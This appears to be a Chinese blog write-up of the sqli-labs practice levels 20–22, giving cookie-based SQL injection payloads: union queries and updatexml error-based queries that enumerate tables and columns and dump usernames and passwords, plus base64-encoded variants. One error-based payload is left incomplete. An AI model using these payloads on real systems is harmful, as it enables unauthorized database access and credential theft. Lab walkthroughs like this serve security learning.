sqli-labs Less20-Less22

Posted 2021-03-08 骑着七彩祥云的少年

Less-20

登陆成功后，出现cookie，登陆失败会显示失败信息

登陆成功后，后台将usename放入cookie中，再次登陆时候只要是cookie没过期，就会去cookie里面取值，然后进行查询

 

 

可以使用chrom里面的cookie-editer,使用burpsuite抓包

方法一union联合查询：
Cookie: uname=admi’ order by 3#

 

 当order by x后为3时，不报错，当x为4时，报错，说明栏位为3

查库  Cookie: uname=admi’ union select 1,2,database()#

 

 查表 Cookie: uname=\'union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=\'security\'#

 

 查列  uname=adm\' union select 1,2,group_concat(column_name)from information_schema.columns where table_name=\'users\'#

 

 查字段  uname=adm\' union select 1,2,group_concat(concat_ws(\'-\',username,password))from security.users#

 

 

 方法二，报错型注入

查库  Cookie: uname=adm\' or updatexml(1,concat(0x7e,database(),0x7e),1)#

 

 

查表  Cookie: uname=adm\' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=\'security\'),0x7e),1)#
查列  Cookie: uname=adm\' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=\'users\' #
查字段  Cookie:uname=adm\' or updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1)#

 

Less-21

 

输入密码登陆后，可以看到cookie: uname被加密

 

 百度搜索Base64就可以解决，推荐网址https://base64.us/

 

 查表 uname=\')union select 1,2,database()#

 

 

 

 除了多了一步编码，其他步骤均与第20关类似

 

Less-22

通过编码测试发现，这一关的包裹是双引号

uname="union select 1,2,database()#

解码为InVuaW9uIHNlbGVjdCAxLDIsZGF0YWJhc2UoKSM=

其他步骤均与第21关相同